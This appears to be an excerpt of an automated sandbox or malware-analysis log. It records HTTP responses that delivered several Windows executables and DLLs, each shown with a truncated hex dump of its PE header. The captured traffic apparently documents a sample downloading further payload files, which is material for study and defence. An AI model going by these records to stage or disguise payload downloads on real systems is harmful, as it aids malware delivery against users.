40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:50 GMTContent-Type: application/octet-streamContent-Length: 290344Last-Modified: Tue, 03 Sep 2024 12:56:21 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70775-46e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 04 00 00 0a 00 00 00 00 00 00 7e 5a 04 00 00 20 00 00 00 60 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 31 48 04 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 5a 04 00 57 00 00 00 00 60 04 00 02 06 00 00 00 00 00 00 00 00 00 00 00 48 04 00 28 26 00 00 00 80 04 00 0c 00 00 00 ec 58 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 3a 04 00 00 20 00 00 00 3c 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 60 04 00 00 08 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 46 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5a 04 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 4c 04 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 5e 33 ca c7 5d b6 b8 aa c0 42 cb c3 33 0b b3 48 31 5e 98 60 61 56 0f 92 6a 82 28 58 df 07 60 f0 92 b4 76 4b 29 da f1 67 41 d3 57 ca 7f a1 a3 7d 2a 3c 88 9e 3c 4c e6 d1 87 f5 fd 80 b0 81 8c 25 ae fc 7d 78 0a 33 31 d8 74 